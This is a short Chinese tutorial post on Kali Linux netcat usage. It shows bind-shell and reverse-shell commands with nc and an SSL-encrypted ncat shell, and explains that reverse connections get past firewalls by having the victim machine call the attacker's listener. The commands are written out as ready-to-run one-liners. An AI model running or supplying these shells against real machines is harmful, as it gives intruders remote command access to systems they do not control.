【KALI使用】7 NC——远程控制

远程控制/木马

正向

哪个加bash,哪个被控制。

A:nc -lp 333 -c bash		# -c 控制命令
B:nc 1.1.1.1 333

在这里插入图片描述

反向

A: nc 1.1.1.1 333 -c bash
B: nc -lp 333

在B上执行命令是对A机上进行的操作。

正向,服务器的防火墙一般不会打开陌生的333端口,服务器加强安全可以禁止内到外的连接,只开一个端口。所以远端通常连接不上,所以使用反向连接,在攻击端监听端口,被攻击端启动脚本,每次启动都会连接攻击者开的端口, Windows用户把bash改成cmd;
建立了连接以后可以获得客户端也可以获得服务端的shell。

加密所有流量

nc缺乏加密和身份验证的能力
ncat可以弥补nc一些缺陷,是nmap工具包中的命令。

A:ncat ncat -c bash  --allow 192.168.20.1 -vnl 333 --ssl			# 服务端 允许哪个ip连接我 开始监听
B:ncat -nv 1.1.1.1 333 --ssl
# 进行了密钥的通信

  • ssl加密,根据来源地址进行限制。
  • 功能很强大,但是版本很多,不同系统/平台的nc参数功能不尽相同。
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值